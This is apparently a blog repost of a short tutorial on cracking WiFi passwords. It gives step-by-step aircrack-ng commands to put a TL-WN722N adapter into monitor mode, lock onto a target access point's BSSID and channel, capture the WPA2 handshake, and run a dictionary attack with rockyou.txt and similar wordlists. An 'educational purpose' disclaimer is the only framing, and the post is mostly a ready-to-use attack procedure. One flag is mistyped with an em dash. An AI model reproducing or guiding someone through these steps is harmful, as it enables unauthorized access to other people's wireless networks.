paulwong

Hack a Wifi Network WPA2/WPA/WEP

First of all you will need a Linux operating system & a little education about Python
programming.
You can install Linux operating system on any Pc or Laptop.
Note : This tutorial is only for eduactional purpose. The author of this pdf is not responsible for any illegal work. During installing and setting up you can loose all of your data, Do not do if you don’t know about programming.
Device:
Use Tp-link TL-WN722N Wifi Adapter for High gain.
Start! Open Terminal:
1. airmon-ng check kill
2. airmon-ng
3. airmon-ng start wlan0
4. airodump-ng wlan0mon
5. (control + c to stop)
6. airodump-ng wlan0mon —bssid 5C:F9:6A:CD:8A:1D -c 1 -w WPA2
7. wait for 1 minute, capture handshake
8. aircrack-ng WPA2-01.cap -w /root/rockyou.txt
/darkc0de
/Wpa list 1,2,3

darkc0de, Wpalist & rockyou.txt are the dictionaries files. You can download these from internet.
This PDF is made by Malik Mubashir

posted on 2016-04-05 16:53 paulwong 阅读(471) 评论(0)  编辑  收藏 所属分类: LINUX


只有注册用户登录后才能发表评论。


网站导航: